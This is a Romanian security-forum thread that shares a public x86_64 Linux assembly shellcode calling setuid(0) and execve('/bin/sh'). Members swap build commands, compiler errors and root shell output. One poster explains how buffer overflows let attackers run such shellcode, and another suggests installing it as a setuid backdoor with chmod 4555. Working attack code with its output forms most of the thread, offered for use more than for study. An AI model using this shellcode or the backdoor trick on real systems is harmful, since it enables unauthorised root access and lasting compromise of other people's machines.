setuid(0) + execve("/bin/sh") on x86_64 GNU/Linux

[Nytro]

setuid(0) + execve("/bin/sh") on x86_64 GNU/Linux

# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the Nth Dimension nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# (c) Tim Brown, 2009
# <mailto:timb@nth-dimension.org.uk>
# <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
#
# setuid(0) + execve("/bin/sh") on x86_64 GNU/Linux

.text
        .globl _start
_start:
    # uid = 0
    xor %edi, %edi # set %edi to 0
    # setuid
    mov $0x69, %al # set %al to 69 (setuid)
    syscall # enter the kernel
    # *filename = "/bin//sh"
    xor %ax, %ax # set %ax to 0
    push %ax # push %ax on to the stack
        movq $0x68732f2f6e69622f, %rbx # set %rbx to "hs//nib/"
        pushq %rbx # push %rbx on to the stack
        movq %rsp, %rdi # set %rdi to %esp
    # **argv = [0, *filename]
        xorq %rcx, %rcx # set %rcx to 0
        pushq %rcx # push %rcx on to the stack
        pushq %rdi # push %rdi on to the stack
        movq %rsp, %rsi # set %rsi to %rsp
    # execve
        mov $0x3b, %al # set %al to 59 (execve)
        syscall # enter the kernel

L-am postat deoarece e explicat.

Sursa: http://www.nth-dimension.org.uk/pub/setuid_execve_x86_64_Linux.asm

[florinul]

in ce e scris in c ?

[H3xoR]

assembly [GAS]

[florinul]

si cum se foloseste sau compileaza?

[u0m3]

si cum se foloseste sau compileaza?

gcc setuid_execve_x86_64_Linux.asm -o shell

Daca asa nu merge schimba extensia fisierului sursa din .asm in .s

[florinul]

[root@#KaNaDa-TeaM BackDoor:/root]# gcc a.s -o shel

/tmp/ccuIeglI.o: In function `_start':

(.text+0x0): multiple definition of `_start'

/usr/lib/gcc/x86_64-redhat-linux/4.4.6/../../../../lib64/crt1.o:(.text+0x0): first defined here

/usr/lib/gcc/x86_64-redhat-linux/4.4.6/../../../../lib64/crt1.o: In function `_start':

(.text+0x20): undefined reference to `main'

collect2: ld returned 1 exit status

[root@#KaNaDa-TeaM BackDoor:/root]# gcc a.s -o shell

/tmp/cchulhnB.o: In function `_start':

(.text+0x0): multiple definition of `_start'

/usr/lib/gcc/x86_64-redhat-linux/4.4.6/../../../../lib64/crt1.o:(.text+0x0): first defined here

/usr/lib/gcc/x86_64-redhat-linux/4.4.6/../../../../lib64/crt1.o: In function `_start':

(.text+0x20): undefined reference to `main'

collect2: ld returned 1 exit status

[kNigHt]

Nu merge compilat orice i-as face sa moara ma-sa. A reusit cineva?

EDIT: Am reusit, poate ajuta pe cineva...

[root@x] ~/test2 
$ wget http://www.nth-dimension.org.uk/pub/setuid_execve_x86_64_Linux.asm
[ bla bla ]

[root@x] ~/test2 
$ ls
setuid_execve_x86_64_Linux.asm

[root@x] ~/test2 
$ mv setuid_execve_x86_64_Linux.asm setuid_execve_x86_64_Linux.s

[root@x] ~/test2 
$ gcc setuid_execve_x86_64_Linux.s -c -o setuid_execve_x86_64_Linux

[root@x] ~/test2 
$ ld setuid_execve_x86_64_Linux -o setuid_execve_x86_64_Linux_compiled

[root@x] ~/test2 
$ chmod +x setuid_execve_x86_64_Linux_compiled

[root@x] ~/test2 
$ ./setuid_execve_x86_64_Linux_compiled
# whoami
root
# 
# 
# whatido
/bin//sh: 4: whatido: not found
# 
# 
# id  
uid=0(root) gid=0(root) groups=0(root)
# 
# 

Edited July 23, 2013 by kNigHt

[Zatarra]

@knight - Sper ca nu l-ai executat ca root

[florinul]

)

[Nytro]

@knight - Sper ca nu l-ai executat ca root

E in regula, l-am citit inainte de a posta, de aceea l-am postat.

Sunt 2 syscall-uri:

- setuid

- execve

Corespund cu cele de aici: >Ryan A. Chapman | Linux System Call Table for x86_64

Iar acea "linie" este "hs//nib/" => /bin/sh

[Zatarra]

E in regula, l-am citit inainte de a posta, de aceea l-am postat.

Sunt 2 syscall-uri:

- setuid

- execve

Corespund cu cele de aici: >Ryan A. Chapman | Linux System Call Table for x86_64

Iar acea "linie" este "hs//nib/" => /bin/sh

Nu ma refeream la faptul ca are ceva bad in el, ma referam la faptul ca daca il executi deja ca uid 0 ce rost mai are?

[bcman]

Am facut exact acelasi lucru ca si knight si primesc urmatoarele erori la compilare:

setuid_execve_x86_64_Linux.s: Assembler messages:

setuid_execve_x86_64_Linux.s:42: Error: bad register name `%rbx'

setuid_execve_x86_64_Linux.s:43: Error: bad register name `%rbx'

setuid_execve_x86_64_Linux.s:44: Error: bad register name `%rsp'

setuid_execve_x86_64_Linux.s:46: Error: bad register name `%rcx'

setuid_execve_x86_64_Linux.s:47: Error: bad register name `%rcx'

setuid_execve_x86_64_Linux.s:48: Error: bad register name `%rdi'

setuid_execve_x86_64_Linux.s:49: Error: bad register name `%rsp'

Ma gandesc ca e de la mine, daca voua v-a mers. Ceva idei?

[Zatarra]

Am facut exact acelasi lucru ca si knight si primesc urmatoarele erori la compilare:

Ma gandesc ca e de la mine, daca voua v-a mers. Ceva idei?

E x86_64 serverul? Dai uname -i

[bcman]

E x86_64 serverul? Dai uname -i

Ups, my bad. N-am fost atent, l-am testat pe un i386. Am facut proba acum si pe un x86_64 si functioneaza. Mersi!

Legat de postul tau adresat lui knight, din cate vad nu l-a rulat ca root, a devenit root doar dupa executare.

[Zatarra]

Ups, my bad. N-am fost atent, l-am testat pe un i386. Am facut proba acum si pe un x86_64 si functioneaza. Mersi!

Legat de postul tau adresat lui knight, din cate vad nu l-a rulat ca root, a devenit root doar dupa executare.

Stiu ca $ face parte din prompt-ul unui user (!=root) dar depinde de distributie, eram doar curios Eu sincer nici acum nu l-am testat, sunt curios pe ce versiuni de kernel merge si cand a fost reparat.

[florinul]

Nytro spune-ne si noua cum se utilizeaza ca eu nu am reusit sa il compilez pe nici unu poate gresec eu pe undeva

[kNigHt]

@Zatarra N-are niciun rost sa-l executi ca root, vroiam doar sa vad daca e corect compilat

In orice caz, nu mi-a mers privilege escalation cu el.

[florinul]

Knight erai deja root

[root@x] ~/test2

$ ./setuid_execve_x86_64_Linux_compiled

# whoami

root

[shaggi]

shaggi@gmail:~$ gcc cacat.s -c -o cacat
shaggi@gmail:~$ ./cacat
-bash: ./cacat: Permission denied
shaggi@gmail:~$ chmod +x ./cacat
shaggi@gmail:~$ ./cacat
-bash: ./cacat: cannot execute binary file
shaggi@gmail:~$ 

ce cacat?

[Nytro]

[root@rstforums ~]# as test.asm -o object.o
[root@rstforums ~]# ld object.o -o shell    
[root@rstforums ~]# ./shell 
sh-3.2# 

Nu e un privilege escalation exploit, e doar un shellcode care deschide un shell.

1. setuid: http://linux.die.net/man/2/setuid

2. execve: /bin/sh

Edited July 26, 2013 by Nytro

[shaggi]

nu-si are rostul, merge doar cand e rulat ca root...

shaggi@gmail:~$ sudo ./shell
# exit
shaggi@gmail:~$ ./shell
Segmentation fault
shaggi@gmail:~$ uname -r -i
2.6.32-042stab078.28 x86_64
shaggi@gmail:~$ 

LE: e bun pe post de backdoor cu chmod 4555, adica -r-sr-xr-x

Edited July 26, 2013 by shaggi

[Nytro]

Normal, nu e EXPLOIT, e SHELLCODE.

Vedeti tutorialele facute de neox.

Pe scurt:

1. Ai un program/server (Apache HTTPD de exemplu) pe Linux

2. Acel program are un buffer static: char buffer[100]

3. Cand intri pe o pagina web: GET /pagina.php HTTP/1.1, acest rand e pus in acel buffer

4. Daca pui peste 100 de caractere: GET /paginaaaaaaaaaaaaaaaaaaaaaaaaaa...aaaaaaaaaaaaaaa.php se depaseste dimensiuea acelui buffer

5. Ceea ce depaseste acest buffer, in conditii optime, poate suprascrie EIP-ul (codul in executie)

6. Prin exploatarea acestei probleme tu ajungi la posibilitatea de a rula cod, ca cel de mai sus, shellcode, in locul codului programului respectiv

7. Codul (de mai sus), se executa, si iti ofera un shell, ca tu, om rau, sa executi comenzi rele

E doar ideea, foarte pe scurt.

NU iti exploateaza o problema din kernel ca sa "fii root". Doar deschide un shell.

Vedeti asta: setuid - Wikipedia, the free encyclopedia

[florinul]

deci pana la urma nu e local exploit nu ?

[Nytro]

Normal, nu e EXPLOIT, e SHELLCODE.

Vedeti tutorialele facute de neox.

Pe scurt:

1. Ai un program/server (Apache HTTPD de exemplu) pe Linux

2. Acel program are un buffer static: char buffer[100]

3. Cand intri pe o pagina web: GET /pagina.php HTTP/1.1, acest rand e pus in acel buffer

4. Daca pui peste 100 de caractere: GET /paginaaaaaaaaaaaaaaaaaaaaaaaaaa...aaaaaaaaaaaaaaa.php se depaseste dimensiuea acelui buffer

5. Ceea ce depaseste acest buffer, in conditii optime, poate suprascrie EIP-ul (codul in executie)

6. Prin exploatarea acestei probleme tu ajungi la posibilitatea de a rula cod, ca cel de mai sus, shellcode, in locul codului programului respectiv

7. Codul (de mai sus), se executa, si iti ofera un shell, ca tu, om rau, sa executi comenzi rele

E doar ideea, foarte pe scurt.

NU iti exploateaza o problema din kernel ca sa "fii root". Doar deschide un shell.

Vedeti asta: setuid - Wikipedia, the free encyclopedia

Am colorat.

[l3arn3r]

Nu merge compilat orice i-as face sa moara ma-sa. A reusit cineva?

EDIT: Am reusit, poate ajuta pe cineva...

[root@x] ~/test2 
$ wget http://www.nth-dimension.org.uk/pub/setuid_execve_x86_64_Linux.asm
[ bla bla ]

[root@x] ~/test2 
$ ls
setuid_execve_x86_64_Linux.asm

[root@x] ~/test2 
$ mv setuid_execve_x86_64_Linux.asm setuid_execve_x86_64_Linux.s

[root@x] ~/test2 
$ gcc setuid_execve_x86_64_Linux.s -c -o setuid_execve_x86_64_Linux

[root@x] ~/test2 
$ ld setuid_execve_x86_64_Linux -o setuid_execve_x86_64_Linux_compiled

[root@x] ~/test2 
$ chmod +x setuid_execve_x86_64_Linux_compiled

[root@x] ~/test2 
$ ./setuid_execve_x86_64_Linux_compiled
# whoami
root
# 
# 
# whatido
/bin//sh: 4: whatido: not found
# 
# 
# id  
uid=0(root) gid=0(root) groups=0(root)
# 
# 

#uname -a

Please post Result of this command